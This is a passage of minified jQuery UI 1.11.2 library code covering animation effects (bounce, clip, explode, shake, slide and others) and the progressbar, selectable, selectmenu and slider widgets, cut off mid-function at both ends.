s,n,a,o=e(this),r=["position","top","bottom","left","right","height","width"],h=e.effects.setMode(o,t.mode||"effect"),l="hide"===h,u="show"===h,d=t.direction||"up",c=t.distance,p=t.times||5,f=2*p+(u||l?1:0),m=t.duration/f,g=t.easing,v="up"===d||"down"===d?"top":"left",y="up"===d||"left"===d,b=o.queue(),_=b.length;for((u||l)&&r.push("opacity"),e.effects.save(o,r),o.show(),e.effects.createWrapper(o),c||(c=o["top"===v?"outerHeight":"outerWidth"]()/3),u&&(a={opacity:1},a[v]=0,o.css("opacity",0).css(v,y?2*-c:2*c).animate(a,m,g)),l&&(c/=Math.pow(2,p-1)),a={},a[v]=0,s=0;p>s;s++)n={},n[v]=(y?"-=":"+=")+c,o.animate(n,m,g).animate(a,m,g),c=l?2*c:c/2;l&&(n={opacity:0},n[v]=(y?"-=":"+=")+c,o.animate(n,m,g)),o.queue(function(){l&&o.hide(),e.effects.restore(o,r),e.effects.removeWrapper(o),i()}),_>1&&b.splice.apply(b,[1,0].concat(b.splice(_,f+1))),o.dequeue()},e.effects.effect.clip=function(t,i){var s,n,a,o=e(this),r=["position","top","bottom","left","right","height","width"],h=e.effects.setMode(o,t.mode||"hide"),l="show"===h,u=t.direction||"vertical",d="vertical"===u,c=d?"height":"width",p=d?"top":"left",f={};e.effects.save(o,r),o.show(),s=e.effects.createWrapper(o).css({overflow:"hidden"}),n="IMG"===o[0].tagName?s:o,a=n[c](),l&&(n.css(c,0),n.css(p,a/2)),f[c]=l?a:0,f[p]=l?0:a/2,n.animate(f,{queue:!1,duration:t.duration,easing:t.easing,complete:function(){l||o.hide(),e.effects.restore(o,r),e.effects.removeWrapper(o),i()}})},e.effects.effect.drop=function(t,i){var s,n=e(this),a=["position","top","bottom","left","right","opacity","height","width"],o=e.effects.setMode(n,t.mode||"hide"),r="show"===o,h=t.direction||"left",l="up"===h||"down"===h?"top":"left",u="up"===h||"left"===h?"pos":"neg",d={opacity:r?1:0};e.effects.save(n,a),n.show(),e.effects.createWrapper(n),s=t.distance||n["top"===l?"outerHeight":"outerWidth"](!0)/2,r&&n.css("opacity",0).css(l,"pos"===u?-s:s),d[l]=(r?"pos"===u?"+=":"-=":"pos"===u?"-=":"+=")+s,n.animate(d,{queue:!1,duration:t.duration,easing:t.easing,complete:function(){"hide"===o&&n.hide(),e.effects.restore(n,a),e.effects.removeWrapper(n),i()}})},e.effects.effect.explode=function(t,i){function s(){b.push(this),b.length===d*c&&n()}function n(){p.css({visibility:"visible"}),e(b).remove(),m||p.hide(),i()}var a,o,r,h,l,u,d=t.pieces?Math.round(Math.sqrt(t.pieces)):3,c=d,p=e(this),f=e.effects.setMode(p,t.mode||"hide"),m="show"===f,g=p.show().css("visibility","hidden").offset(),v=Math.ceil(p.outerWidth()/c),y=Math.ceil(p.outerHeight()/d),b=[];for(a=0;d>a;a++)for(h=g.top+a*y,u=a-(d-1)/2,o=0;c>o;o++)r=g.left+o*v,l=o-(c-1)/2,p.clone().appendTo("body").wrap("<div></div>").css({position:"absolute",visibility:"visible",left:-o*v,top:-a*y}).parent().addClass("ui-effects-explode").css({position:"absolute",overflow:"hidden",width:v,height:y,left:r+(m?l*v:0),top:h+(m?u*y:0),opacity:m?0:1}).animate({left:r+(m?0:l*v),top:h+(m?0:u*y),opacity:m?1:0},t.duration||500,t.easing,s)},e.effects.effect.fade=function(t,i){var s=e(this),n=e.effects.setMode(s,t.mode||"toggle");s.animate({opacity:n},{queue:!1,duration:t.duration,easing:t.easing,complete:i})},e.effects.effect.fold=function(t,i){var s,n,a=e(this),o=["position","top","bottom","left","right","height","width"],r=e.effects.setMode(a,t.mode||"hide"),h="show"===r,l="hide"===r,u=t.size||15,d=/([0-9]+)%/.exec(u),c=!!t.horizFirst,p=h!==c,f=p?["width","height"]:["height","width"],m=t.duration/2,g={},v={};e.effects.save(a,o),a.show(),s=e.effects.createWrapper(a).css({overflow:"hidden"}),n=p?[s.width(),s.height()]:[s.height(),s.width()],d&&(u=parseInt(d[1],10)/100*n[l?0:1]),h&&s.css(c?{height:0,width:u}:{height:u,width:0}),g[f[0]]=h?n[0]:u,v[f[1]]=h?n[1]:0,s.animate(g,m,t.easing).animate(v,m,t.easing,function(){l&&a.hide(),e.effects.restore(a,o),e.effects.removeWrapper(a),i()})},e.effects.effect.highlight=function(t,i){var s=e(this),n=["backgroundImage","backgroundColor","opacity"],a=e.effects.setMode(s,t.mode||"show"),o={backgroundColor:s.css("backgroundColor")};"hide"===a&&(o.opacity=0),e.effects.save(s,n),s.show().css({backgroundImage:"none",backgroundColor:t.color||"#ffff99"}).animate(o,{queue:!1,duration:t.duration,easing:t.easing,complete:function(){"hide"===a&&s.hide(),e.effects.restore(s,n),i()}})},e.effects.effect.size=function(t,i){var s,n,a,o=e(this),r=["position","top","bottom","left","right","width","height","overflow","opacity"],h=["position","top","bottom","left","right","overflow","opacity"],l=["width","height","overflow"],u=["fontSize"],d=["borderTopWidth","borderBottomWidth","paddingTop","paddingBottom"],c=["borderLeftWidth","borderRightWidth","paddingLeft","paddingRight"],p=e.effects.setMode(o,t.mode||"effect"),f=t.restore||"effect"!==p,m=t.scale||"both",g=t.origin||["middle","center"],v=o.css("position"),y=f?r:h,b={height:0,width:0,outerHeight:0,outerWidth:0};"show"===p&&o.show(),s={height:o.height(),width:o.width(),outerHeight:o.outerHeight(),outerWidth:o.outerWidth()},"toggle"===t.mode&&"show"===p?(o.from=t.to||b,o.to=t.from||s):(o.from=t.from||("show"===p?b:s),o.to=t.to||("hide"===p?b:s)),a={from:{y:o.from.height/s.height,x:o.from.width/s.width},to:{y:o.to.height/s.height,x:o.to.width/s.width}},("box"===m||"both"===m)&&(a.from.y!==a.to.y&&(y=y.concat(d),o.from=e.effects.setTransition(o,d,a.from.y,o.from),o.to=e.effects.setTransition(o,d,a.to.y,o.to)),a.from.x!==a.to.x&&(y=y.concat(c),o.from=e.effects.setTransition(o,c,a.from.x,o.from),o.to=e.effects.setTransition(o,c,a.to.x,o.to))),("content"===m||"both"===m)&&a.from.y!==a.to.y&&(y=y.concat(u).concat(l),o.from=e.effects.setTransition(o,u,a.from.y,o.from),o.to=e.effects.setTransition(o,u,a.to.y,o.to)),e.effects.save(o,y),o.show(),e.effects.createWrapper(o),o.css("overflow","hidden").css(o.from),g&&(n=e.effects.getBaseline(g,s),o.from.top=(s.outerHeight-o.outerHeight())*n.y,o.from.left=(s.outerWidth-o.outerWidth())*n.x,o.to.top=(s.outerHeight-o.to.outerHeight)*n.y,o.to.left=(s.outerWidth-o.to.outerWidth)*n.x),o.css(o.from),("content"===m||"both"===m)&&(d=d.concat(["marginTop","marginBottom"]).concat(u),c=c.concat(["marginLeft","marginRight"]),l=r.concat(d).concat(c),o.find("*[width]").each(function(){var i=e(this),s={height:i.height(),width:i.width(),outerHeight:i.outerHeight(),outerWidth:i.outerWidth()};
f&&e.effects.save(i,l),i.from={height:s.height*a.from.y,width:s.width*a.from.x,outerHeight:s.outerHeight*a.from.y,outerWidth:s.outerWidth*a.from.x},i.to={height:s.height*a.to.y,width:s.width*a.to.x,outerHeight:s.height*a.to.y,outerWidth:s.width*a.to.x},a.from.y!==a.to.y&&(i.from=e.effects.setTransition(i,d,a.from.y,i.from),i.to=e.effects.setTransition(i,d,a.to.y,i.to)),a.from.x!==a.to.x&&(i.from=e.effects.setTransition(i,c,a.from.x,i.from),i.to=e.effects.setTransition(i,c,a.to.x,i.to)),i.css(i.from),i.animate(i.to,t.duration,t.easing,function(){f&&e.effects.restore(i,l)})})),o.animate(o.to,{queue:!1,duration:t.duration,easing:t.easing,complete:function(){0===o.to.opacity&&o.css("opacity",o.from.opacity),"hide"===p&&o.hide(),e.effects.restore(o,y),f||("static"===v?o.css({position:"relative",top:o.to.top,left:o.to.left}):e.each(["top","left"],function(e,t){o.css(t,function(t,i){var s=parseInt(i,10),n=e?o.to.left:o.to.top;return"auto"===i?n+"px":s+n+"px"})})),e.effects.removeWrapper(o),i()}})},e.effects.effect.scale=function(t,i){var s=e(this),n=e.extend(!0,{},t),a=e.effects.setMode(s,t.mode||"effect"),o=parseInt(t.percent,10)||(0===parseInt(t.percent,10)?0:"hide"===a?0:100),r=t.direction||"both",h=t.origin,l={height:s.height(),width:s.width(),outerHeight:s.outerHeight(),outerWidth:s.outerWidth()},u={y:"horizontal"!==r?o/100:1,x:"vertical"!==r?o/100:1};n.effect="size",n.queue=!1,n.complete=i,"effect"!==a&&(n.origin=h||["middle","center"],n.restore=!0),n.from=t.from||("show"===a?{height:0,width:0,outerHeight:0,outerWidth:0}:l),n.to={height:l.height*u.y,width:l.width*u.x,outerHeight:l.outerHeight*u.y,outerWidth:l.outerWidth*u.x},n.fade&&("show"===a&&(n.from.opacity=0,n.to.opacity=1),"hide"===a&&(n.from.opacity=1,n.to.opacity=0)),s.effect(n)},e.effects.effect.puff=function(t,i){var s=e(this),n=e.effects.setMode(s,t.mode||"hide"),a="hide"===n,o=parseInt(t.percent,10)||150,r=o/100,h={height:s.height(),width:s.width(),outerHeight:s.outerHeight(),outerWidth:s.outerWidth()};e.extend(t,{effect:"scale",queue:!1,fade:!0,mode:n,complete:i,percent:a?o:100,from:a?h:{height:h.height*r,width:h.width*r,outerHeight:h.outerHeight*r,outerWidth:h.outerWidth*r}}),s.effect(t)},e.effects.effect.pulsate=function(t,i){var s,n=e(this),a=e.effects.setMode(n,t.mode||"show"),o="show"===a,r="hide"===a,h=o||"hide"===a,l=2*(t.times||5)+(h?1:0),u=t.duration/l,d=0,c=n.queue(),p=c.length;for((o||!n.is(":visible"))&&(n.css("opacity",0).show(),d=1),s=1;l>s;s++)n.animate({opacity:d},u,t.easing),d=1-d;n.animate({opacity:d},u,t.easing),n.queue(function(){r&&n.hide(),i()}),p>1&&c.splice.apply(c,[1,0].concat(c.splice(p,l+1))),n.dequeue()},e.effects.effect.shake=function(t,i){var s,n=e(this),a=["position","top","bottom","left","right","height","width"],o=e.effects.setMode(n,t.mode||"effect"),r=t.direction||"left",h=t.distance||20,l=t.times||3,u=2*l+1,d=Math.round(t.duration/u),c="up"===r||"down"===r?"top":"left",p="up"===r||"left"===r,f={},m={},g={},v=n.queue(),y=v.length;for(e.effects.save(n,a),n.show(),e.effects.createWrapper(n),f[c]=(p?"-=":"+=")+h,m[c]=(p?"+=":"-=")+2*h,g[c]=(p?"-=":"+=")+2*h,n.animate(f,d,t.easing),s=1;l>s;s++)n.animate(m,d,t.easing).animate(g,d,t.easing);n.animate(m,d,t.easing).animate(f,d/2,t.easing).queue(function(){"hide"===o&&n.hide(),e.effects.restore(n,a),e.effects.removeWrapper(n),i()}),y>1&&v.splice.apply(v,[1,0].concat(v.splice(y,u+1))),n.dequeue()},e.effects.effect.slide=function(t,i){var s,n=e(this),a=["position","top","bottom","left","right","width","height"],o=e.effects.setMode(n,t.mode||"show"),r="show"===o,h=t.direction||"left",l="up"===h||"down"===h?"top":"left",u="up"===h||"left"===h,d={};e.effects.save(n,a),n.show(),s=t.distance||n["top"===l?"outerHeight":"outerWidth"](!0),e.effects.createWrapper(n).css({overflow:"hidden"}),r&&n.css(l,u?isNaN(s)?"-"+s:-s:s),d[l]=(r?u?"+=":"-=":u?"-=":"+=")+s,n.animate(d,{queue:!1,duration:t.duration,easing:t.easing,complete:function(){"hide"===o&&n.hide(),e.effects.restore(n,a),e.effects.removeWrapper(n),i()}})},e.effects.effect.transfer=function(t,i){var s=e(this),n=e(t.to),a="fixed"===n.css("position"),o=e("body"),r=a?o.scrollTop():0,h=a?o.scrollLeft():0,l=n.offset(),u={top:l.top-r,left:l.left-h,height:n.innerHeight(),width:n.innerWidth()},d=s.offset(),c=e("<div class='ui-effects-transfer'></div>").appendTo(document.body).addClass(t.className).css({top:d.top-r,left:d.left-h,height:s.innerHeight(),width:s.innerWidth(),position:a?"fixed":"absolute"}).animate(u,t.duration,t.easing,function(){c.remove(),i()})},e.widget("ui.progressbar",{version:"1.11.2",options:{max:100,value:0,change:null,complete:null},min:0,_create:function(){this.oldValue=this.options.value=this._constrainedValue(),this.element.addClass("ui-progressbar ui-widget ui-widget-content ui-corner-all").attr({role:"progressbar","aria-valuemin":this.min}),this.valueDiv=e("<div class='ui-progressbar-value ui-widget-header ui-corner-left'></div>").appendTo(this.element),this._refreshValue()},_destroy:function(){this.element.removeClass("ui-progressbar ui-widget ui-widget-content ui-corner-all").removeAttr("role").removeAttr("aria-valuemin").removeAttr("aria-valuemax").removeAttr("aria-valuenow"),this.valueDiv.remove()},value:function(e){return void 0===e?this.options.value:(this.options.value=this._constrainedValue(e),this._refreshValue(),void 0)},_constrainedValue:function(e){return void 0===e&&(e=this.options.value),this.indeterminate=e===!1,"number"!=typeof e&&(e=0),this.indeterminate?!1:Math.min(this.options.max,Math.max(this.min,e))},_setOptions:function(e){var t=e.value;delete e.value,this._super(e),this.options.value=this._constrainedValue(t),this._refreshValue()},_setOption:function(e,t){"max"===e&&(t=Math.max(this.min,t)),"disabled"===e&&this.element.toggleClass("ui-state-disabled",!!t).attr("aria-disabled",t),this._super(e,t)},_percentage:function(){return this.indeterminate?100:100*(this.options.value-this.min)/(this.options.max-this.min)},_refreshValue:function(){var t=this.options.value,i=this._percentage();this.valueDiv.toggle(this.indeterminate||t>this.min).toggleClass("ui-corner-right",t===this.options.max).width(i.toFixed(0)+"%"),this.element.toggleClass("ui-progressbar-indeterminate",this.indeterminate),this.indeterminate?(this.element.removeAttr("aria-valuenow"),this.overlayDiv||(this.overlayDiv=e("<div class='ui-progressbar-overlay'></div>").appendTo(this.valueDiv))):(this.element.attr({"aria-valuemax":this.options.max,"aria-valuenow":t}),this.overlayDiv&&(this.overlayDiv.remove(),this.overlayDiv=null)),this.oldValue!==t&&(this.oldValue=t,this._trigger("change")),t===this.options.max&&this._trigger("complete")}}),e.widget("ui.selectable",e.ui.mouse,{version:"1.11.2",options:{appendTo:"body",autoRefresh:!0,distance:0,filter:"*",tolerance:"touch",selected:null,selecting:null,start:null,stop:null,unselected:null,unselecting:null},_create:function(){var t,i=this;this.element.addClass("ui-selectable"),this.dragged=!1,this.refresh=function(){t=e(i.options.filter,i.element[0]),t.addClass("ui-selectee"),t.each(function(){var t=e(this),i=t.offset();e.data(this,"selectable-item",{element:this,$element:t,left:i.left,top:i.top,right:i.left+t.outerWidth(),bottom:i.top+t.outerHeight(),startselected:!1,selected:t.hasClass("ui-selected"),selecting:t.hasClass("ui-selecting"),unselecting:t.hasClass("ui-unselecting")})})},this.refresh(),this.selectees=t.addClass("ui-selectee"),this._mouseInit(),this.helper=e("<div class='ui-selectable-helper'></div>")},_destroy:function(){this.selectees.removeClass("ui-selectee").removeData("selectable-item"),this.element.removeClass("ui-selectable ui-selectable-disabled"),this._mouseDestroy()},_mouseStart:function(t){var i=this,s=this.options;this.opos=[t.pageX,t.pageY],this.options.disabled||(this.selectees=e(s.filter,this.element[0]),this._trigger("start",t),e(s.appendTo).append(this.helper),this.helper.css({left:t.pageX,top:t.pageY,width:0,height:0}),s.autoRefresh&&this.refresh(),this.selectees.filter(".ui-selected").each(function(){var s=e.data(this,"selectable-item");s.startselected=!0,t.metaKey||t.ctrlKey||(s.$element.removeClass("ui-selected"),s.selected=!1,s.$element.addClass("ui-unselecting"),s.unselecting=!0,i._trigger("unselecting",t,{unselecting:s.element}))}),e(t.target).parents().addBack().each(function(){var s,n=e.data(this,"selectable-item");return n?(s=!t.metaKey&&!t.ctrlKey||!n.$element.hasClass("ui-selected"),n.$element.removeClass(s?"ui-unselecting":"ui-selected").addClass(s?"ui-selecting":"ui-unselecting"),n.unselecting=!s,n.selecting=s,n.selected=s,s?i._trigger("selecting",t,{selecting:n.element}):i._trigger("unselecting",t,{unselecting:n.element}),!1):void 0}))},_mouseDrag:function(t){if(this.dragged=!0,!this.options.disabled){var i,s=this,n=this.options,a=this.opos[0],o=this.opos[1],r=t.pageX,h=t.pageY;return a>r&&(i=r,r=a,a=i),o>h&&(i=h,h=o,o=i),this.helper.css({left:a,top:o,width:r-a,height:h-o}),this.selectees.each(function(){var i=e.data(this,"selectable-item"),l=!1;i&&i.element!==s.element[0]&&("touch"===n.tolerance?l=!(i.left>r||a>i.right||i.top>h||o>i.bottom):"fit"===n.tolerance&&(l=i.left>a&&r>i.right&&i.top>o&&h>i.bottom),l?(i.selected&&(i.$element.removeClass("ui-selected"),i.selected=!1),i.unselecting&&(i.$element.removeClass("ui-unselecting"),i.unselecting=!1),i.selecting||(i.$element.addClass("ui-selecting"),i.selecting=!0,s._trigger("selecting",t,{selecting:i.element}))):(i.selecting&&((t.metaKey||t.ctrlKey)&&i.startselected?(i.$element.removeClass("ui-selecting"),i.selecting=!1,i.$element.addClass("ui-selected"),i.selected=!0):(i.$element.removeClass("ui-selecting"),i.selecting=!1,i.startselected&&(i.$element.addClass("ui-unselecting"),i.unselecting=!0),s._trigger("unselecting",t,{unselecting:i.element}))),i.selected&&(t.metaKey||t.ctrlKey||i.startselected||(i.$element.removeClass("ui-selected"),i.selected=!1,i.$element.addClass("ui-unselecting"),i.unselecting=!0,s._trigger("unselecting",t,{unselecting:i.element})))))}),!1}},_mouseStop:function(t){var i=this;return this.dragged=!1,e(".ui-unselecting",this.element[0]).each(function(){var s=e.data(this,"selectable-item");s.$element.removeClass("ui-unselecting"),s.unselecting=!1,s.startselected=!1,i._trigger("unselected",t,{unselected:s.element})}),e(".ui-selecting",this.element[0]).each(function(){var s=e.data(this,"selectable-item");s.$element.removeClass("ui-selecting").addClass("ui-selected"),s.selecting=!1,s.selected=!0,s.startselected=!0,i._trigger("selected",t,{selected:s.element})}),this._trigger("stop",t),this.helper.remove(),!1}}),e.widget("ui.selectmenu",{version:"1.11.2",defaultElement:"<select>",options:{appendTo:null,disabled:null,icons:{button:"ui-icon-triangle-1-s"},position:{my:"left top",at:"left bottom",collision:"none"},width:null,change:null,close:null,focus:null,open:null,select:null},_create:function(){var e=this.element.uniqueId().attr("id");this.ids={element:e,button:e+"-button",menu:e+"-menu"},this._drawButton(),this._drawMenu(),this.options.disabled&&this.disable()},_drawButton:function(){var t=this,i=this.element.attr("tabindex");this.label=e("label[for='"+this.ids.element+"']").attr("for",this.ids.button),this._on(this.label,{click:function(e){this.button.focus(),e.preventDefault()}}),this.element.hide(),this.button=e("<span>",{"class":"ui-selectmenu-button ui-widget ui-state-default ui-corner-all",tabindex:i||this.options.disabled?-1:0,id:this.ids.button,role:"combobox","aria-expanded":"false","aria-autocomplete":"list","aria-owns":this.ids.menu,"aria-haspopup":"true"}).insertAfter(this.element),e("<span>",{"class":"ui-icon "+this.options.icons.button}).prependTo(this.button),this.buttonText=e("<span>",{"class":"ui-selectmenu-text"}).appendTo(this.button),this._setText(this.buttonText,this.element.find("option:selected").text()),this._resizeButton(),this._on(this.button,this._buttonEvents),this.button.one("focusin",function(){t.menuItems||t._refreshMenu()}),this._hoverable(this.button),this._focusable(this.button)},_drawMenu:function(){var t=this;this.menu=e("<ul>",{"aria-hidden":"true","aria-labelledby":this.ids.button,id:this.ids.menu}),this.menuWrap=e("<div>",{"class":"ui-selectmenu-menu ui-front"}).append(this.menu).appendTo(this._appendTo()),this.menuInstance=this.menu.menu({role:"listbox",select:function(e,i){e.preventDefault(),t._setSelection(),t._select(i.item.data("ui-selectmenu-item"),e)},focus:function(e,i){var s=i.item.data("ui-selectmenu-item");null!=t.focusIndex&&s.index!==t.focusIndex&&(t._trigger("focus",e,{item:s}),t.isOpen||t._select(s,e)),t.focusIndex=s.index,t.button.attr("aria-activedescendant",t.menuItems.eq(s.index).attr("id"))}}).menu("instance"),this.menu.addClass("ui-corner-bottom").removeClass("ui-corner-all"),this.menuInstance._off(this.menu,"mouseleave"),this.menuInstance._closeOnDocumentClick=function(){return!1},this.menuInstance._isDivider=function(){return!1}},refresh:function(){this._refreshMenu(),this._setText(this.buttonText,this._getSelectedItem().text()),this.options.width||this._resizeButton()},_refreshMenu:function(){this.menu.empty();var e,t=this.element.find("option");t.length&&(this._parseOptions(t),this._renderMenu(this.menu,this.items),this.menuInstance.refresh(),this.menuItems=this.menu.find("li").not(".ui-selectmenu-optgroup"),e=this._getSelectedItem(),this.menuInstance.focus(null,e),this._setAria(e.data("ui-selectmenu-item")),this._setOption("disabled",this.element.prop("disabled")))},open:function(e){this.options.disabled||(this.menuItems?(this.menu.find(".ui-state-focus").removeClass("ui-state-focus"),this.menuInstance.focus(null,this._getSelectedItem())):this._refreshMenu(),this.isOpen=!0,this._toggleAttr(),this._resizeMenu(),this._position(),this._on(this.document,this._documentClick),this._trigger("open",e))},_position:function(){this.menuWrap.position(e.extend({of:this.button},this.options.position))},close:function(e){this.isOpen&&(this.isOpen=!1,this._toggleAttr(),this.range=null,this._off(this.document),this._trigger("close",e))},widget:function(){return this.button},menuWidget:function(){return this.menu},_renderMenu:function(t,i){var s=this,n="";e.each(i,function(i,a){a.optgroup!==n&&(e("<li>",{"class":"ui-selectmenu-optgroup ui-menu-divider"+(a.element.parent("optgroup").prop("disabled")?" ui-state-disabled":""),text:a.optgroup}).appendTo(t),n=a.optgroup),s._renderItemData(t,a)})},_renderItemData:function(e,t){return this._renderItem(e,t).data("ui-selectmenu-item",t)},_renderItem:function(t,i){var s=e("<li>");return i.disabled&&s.addClass("ui-state-disabled"),this._setText(s,i.label),s.appendTo(t)},_setText:function(e,t){t?e.text(t):e.html("&#160;")},_move:function(e,t){var i,s,n=".ui-menu-item";this.isOpen?i=this.menuItems.eq(this.focusIndex):(i=this.menuItems.eq(this.element[0].selectedIndex),n+=":not(.ui-state-disabled)"),s="first"===e||"last"===e?i["first"===e?"prevAll":"nextAll"](n).eq(-1):i[e+"All"](n).eq(0),s.length&&this.menuInstance.focus(t,s)},_getSelectedItem:function(){return this.menuItems.eq(this.element[0].selectedIndex)},_toggle:function(e){this[this.isOpen?"close":"open"](e)},_setSelection:function(){var e;this.range&&(window.getSelection?(e=window.getSelection(),e.removeAllRanges(),e.addRange(this.range)):this.range.select(),this.button.focus())},_documentClick:{mousedown:function(t){this.isOpen&&(e(t.target).closest(".ui-selectmenu-menu, #"+this.ids.button).length||this.close(t))}},_buttonEvents:{mousedown:function(){var e;window.getSelection?(e=window.getSelection(),e.rangeCount&&(this.range=e.getRangeAt(0))):this.range=document.selection.createRange()},click:function(e){this._setSelection(),this._toggle(e)},keydown:function(t){var i=!0;switch(t.keyCode){case e.ui.keyCode.TAB:case e.ui.keyCode.ESCAPE:this.close(t),i=!1;break;case e.ui.keyCode.ENTER:this.isOpen&&this._selectFocusedItem(t);break;case e.ui.keyCode.UP:t.altKey?this._toggle(t):this._move("prev",t);break;case e.ui.keyCode.DOWN:t.altKey?this._toggle(t):this._move("next",t);break;case e.ui.keyCode.SPACE:this.isOpen?this._selectFocusedItem(t):this._toggle(t);break;case e.ui.keyCode.LEFT:this._move("prev",t);break;case e.ui.keyCode.RIGHT:this._move("next",t);break;case e.ui.keyCode.HOME:case e.ui.keyCode.PAGE_UP:this._move("first",t);break;case e.ui.keyCode.END:case e.ui.keyCode.PAGE_DOWN:this._move("last",t);break;default:this.menu.trigger(t),i=!1}i&&t.preventDefault()}},_selectFocusedItem:function(e){var t=this.menuItems.eq(this.focusIndex);t.hasClass("ui-state-disabled")||this._select(t.data("ui-selectmenu-item"),e)},_select:function(e,t){var i=this.element[0].selectedIndex;this.element[0].selectedIndex=e.index,this._setText(this.buttonText,e.label),this._setAria(e),this._trigger("select",t,{item:e}),e.index!==i&&this._trigger("change",t,{item:e}),this.close(t)},_setAria:function(e){var t=this.menuItems.eq(e.index).attr("id");this.button.attr({"aria-labelledby":t,"aria-activedescendant":t}),this.menu.attr("aria-activedescendant",t)},_setOption:function(e,t){"icons"===e&&this.button.find("span.ui-icon").removeClass(this.options.icons.button).addClass(t.button),this._super(e,t),"appendTo"===e&&this.menuWrap.appendTo(this._appendTo()),"disabled"===e&&(this.menuInstance.option("disabled",t),this.button.toggleClass("ui-state-disabled",t).attr("aria-disabled",t),this.element.prop("disabled",t),t?(this.button.attr("tabindex",-1),this.close()):this.button.attr("tabindex",0)),"width"===e&&this._resizeButton()},_appendTo:function(){var t=this.options.appendTo;return t&&(t=t.jquery||t.nodeType?e(t):this.document.find(t).eq(0)),t&&t[0]||(t=this.element.closest(".ui-front")),t.length||(t=this.document[0].body),t},_toggleAttr:function(){this.button.toggleClass("ui-corner-top",this.isOpen).toggleClass("ui-corner-all",!this.isOpen).attr("aria-expanded",this.isOpen),this.menuWrap.toggleClass("ui-selectmenu-open",this.isOpen),this.menu.attr("aria-hidden",!this.isOpen)},_resizeButton:function(){var e=this.options.width;e||(e=this.element.show().outerWidth(),this.element.hide()),this.button.outerWidth(e)},_resizeMenu:function(){this.menu.outerWidth(Math.max(this.button.outerWidth(),this.menu.width("").outerWidth()+1))},_getCreateOptions:function(){return{disabled:this.element.prop("disabled")}},_parseOptions:function(t){var i=[];t.each(function(t,s){var n=e(s),a=n.parent("optgroup");i.push({element:n,index:t,value:n.attr("value"),label:n.text(),optgroup:a.attr("label")||"",disabled:a.prop("disabled")||n.prop("disabled")})}),this.items=i},_destroy:function(){this.menuWrap.remove(),this.button.remove(),this.element.show(),this.element.removeUniqueId(),this.label.attr("for",this.ids.element)}}),e.widget("ui.slider",e.ui.mouse,{version:"1.11.2",widgetEventPrefix:"slide",options:{animate:!1,distance:0,max:100,min:0,orientation:"horizontal",range:!1,step:1,value:0,values:null,change:null,slide:null,start:null,stop:null},numPages:5,_create:function(){this._keySliding=!1,this._mouseSliding=!1,this._animateOff=!0,this._handleIndex=null,this._detectOrientation(),this._mouseInit(),this._calculateNewMax(),this.element.addClass("ui-slider ui-slider-"+this.orientation+" ui-widget"+" ui-widget-content"+" ui-corner-all"),this._refresh(),this._setOption("disabled",this.options.disabled),this._animateOff=!1},_refresh:function(){this._createRange(),this._createHandles(),this._setupEvents(),this._refreshValue()},_createHandles:function(){var t,i,s=this.options,n=this.element.find(".ui-slider-handle").addClass("ui-state-default ui-corner-all"),a="<span class='ui-slider-handle ui-state-default ui-corner-all' tabindex='0'></span>",o=[];for(i=s.values&&s.values.length||1,n.length>i&&(n.slice(i).remove(),n=n.slice(0,i)),t=n.length;i>t;t++)o.push(a);this.handles=n.add(e(o.join("")).appendTo(this.element)),this.handle=this.handles.eq(0),this.handles.each(function(t){e(this).data("ui-slider-handle-index",t)})},_createRange:function(){var t=this.options,i="";t.range?(t.range===!0&&(t.values?t.values.length&&2!==t.values.length?t.values=[t.values[0],t.values[0]]:e.isArray(t.values)&&(t.values=t.values.slice(0)):t.values=[this._valueMin(),this._valueMin()]),this.range&&this.range.length?this.range.removeClass("ui-slider-range-min ui-slider-range-max").css({left:"",bottom:""}):(this.range=e("<div></div>").appendTo(this.element),i="ui-slider-range ui-widget-header ui-corner-all"),this.range.addClass(i+("min"===t.range||"max"===t.range?" ui-slider-range-"+t.range:""))):(this.range&&this.range.remove(),this.range=null)},_setupEvents:function(){this._off(this.handles),this._on(this.handles,this._handleEvents),this._hoverable(this.handles),this._focusable(this.handles)},_destroy:function(){this.handles.remove(),this.range&&this.range.remove(),this.element.removeClass("ui-slider ui-slider-horizontal ui-slider-vertical ui-widget ui-widget-content ui-corner-all"),this._mouseDestroy()},_mouseCapture:function(t){var i,s,n,a,o,r,h,l,u=this,d=this.options;return d.disabled?!1:(this.elementSize={width:this.element.outerWidth(),height:this.element.outerHeight()},this.elementOffset=this.element.offset(),i={x:t.pageX,y:t.pageY},s=this._normValueFromMouse(i),n=this._valueMax()-this._valueMin()+1,this.handles.each(function(t){var i=Math.abs(s-u.values(t));(n>i||n===i&&(t===u._lastChangedValue||u.values(t)===d.min))&&(n=i,a=e(this),o=t)}),r=this._start(t,o),r===!1?!1:(this._mouseSliding=!0,this._handleIndex=o,a.addClass("ui-state-active").focus(),h=a.offset(),l=!e(t.target).parents().addBack().is(".ui-slider-handle"),this._clickOffset=l?{left:0,top:0}:{left:t.pageX-h.left-a.width()/2,top:t.pageY-h.top-a.height()/2-(parseInt(a.css("borderTopWidth"),10)||0)-(parseInt(a.css("borderBottomWidth"),10)||0)+(parseInt(a.css("marginTop"),10)||0)},this.handles.hasClass("ui-state-hover")||this._slide(t,o,s),this._animateOff=!0,!0))},_mouseStart:function(){return!0},_mouseDrag:function(e){var t={x:e.pageX,y:e.pageY},i=this._normValueFromMouse(t);return this._slide(e,this._handleIndex,i),!1},_mouseStop:function(e){return this.handles.removeClass("ui-state-active"),this._mouseSliding=!1,this._stop(e,this._handleIndex),this._change(e,this._handleIndex),this._handleIndex=null,this._clickOffset=null,this._animateOff=!1,!1},_detectOrientation:function(){this.orientation="vertical"===this.options.orientation?"vertical":"horizontal"},_normValueFromMouse:function(e){var t,i,s,n,a;return"horizontal"===this.orientation?(t=this.elementSize.width,i=e.x-this.elementOffset.left-(this._clickOffset?this._clickOffset.left:0)):(t=this.elementSize.height,i=e.y-this.elementOffset.top-(this._clickOffset?this._clickOffset.top:0)),s=i/t,s>1&&(s=1),0>s&&(s=0),"vertical"===this.orientation&&(s=1-s),n=this._valueMax()-this._valueMin(),a=this._valueMin()+s*n,this._trimAlignValue(a)},_start:function(e,t){var i={handle:this.handles[t],value:this.value()};return this.options.values&&this.options.values.length&&(i.value=this.values(t),i.values=this.values()),this._trigger("start",e,i)},_slide:function(e,t,i){var s,n,a;this.options.values&&this.options.values.length?(s=this.values(t?0:1),2===this.options.values.length&&this.options.range===!0&&(0===t&&i>s||1===t&&s>i)&&(i=s),i!==this.values(t)&&(n=this.values(),n[t]=i,a=this._trigger("slide",e,{handle:this.handles[t],value:i,values:n}),s=this.values(t?0:1),a!==!1&&this.values(t,i))):i!==this.value()&&(a=this._trigger("slide",e,{handle:this.handles[t],value:i}),a!==!1&&this.value(i))},_stop:function(e,t){var 